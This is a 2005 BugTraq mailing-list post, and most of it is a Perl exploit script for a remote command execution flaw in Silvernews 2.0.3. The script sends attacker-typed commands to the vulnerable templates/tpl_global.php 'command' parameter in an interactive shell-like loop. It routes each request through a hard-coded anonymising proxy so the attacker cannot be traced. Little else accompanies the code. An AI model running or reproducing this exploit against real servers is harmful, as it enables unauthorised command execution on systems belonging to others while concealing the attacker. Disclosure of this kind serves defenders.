BugTraq
Silvernews 2.0.3 remote command execution exploit, proxy server support! Aug 05 2005 05:15PM
tsl securityfocus com, "[at]" securityfocus com,hackermail com securityfocus com
Exploit for the remote command execution vulnerability in Silvernews 2.0.3:
discovered by:
http://www.securityfocus.com/archive/1/407163/30/0/threaded

sploit:
--------

#!/usr/bin/perl

################TSL#####################################################
######
#
#
# SilverNews Exploit inlcuded Proxy Server Function
# THROAT SECURITY LABS
#
# vuln: http://www.target.com/templates/tpl_global.php?command=[command]
#
#
################TSL#####################################################
######

$l="\015\012";
$t=0;
my $sock;
my $target;
my $location;
my $command;
my $proxy;

#define your proxyserver:
$proxy = "200.186.217.122"; #brazil high anoynmity proxy

use IO::Socket;

sub sploit()
{

$sock = IO::Socket::INET->new(PeerAddr => $proxy, PeerPort => 80,
Proto => "tcp") or die "No Connection to Your ProxyServer: $proxy at Port 80\n";

print $sock "GET $target/$location/templates/tpl_global.php?command=$command HTTP/1.1$l";

print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$l";
print $sock "Connection: close$l";

while (<$sock>) {

if (/^HTTP\/1\.[0-2] ([0-9]{3}) .+$/ and $1 ne "200"){
print "Error! Got HTTP return code $1. Exciting!\n";
exit 1;

}

print if $t==1;
$t=1 if /^$l$/;

}

}

if (@ARGV != 2)

{

print "\n*** by lizard for [T]hroat [S]ecurity [L]abs\n";
print "-------------------------------------------------------\n\n";
print "* usage:\t $0 [target] [path] \n";
print "* example:\t $0 www.target.com newssystem \n";
print "----\n\n\n pia s. i love you forever ;)\n\n";

} else {

$target = $ARGV[0];
$location = $ARGV[1];

print "sending exploit ... please wait\n";
sleep(1);

while(1){

print "[sploit\@$target:/$location\] ";
$_=<STDIN>;
chop;
next if /^$/;
s/ /%20/;
#if ($command=="exit") {exit} else {sploit()};
$command=$_;
sploit();

}

}

#EOF#

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus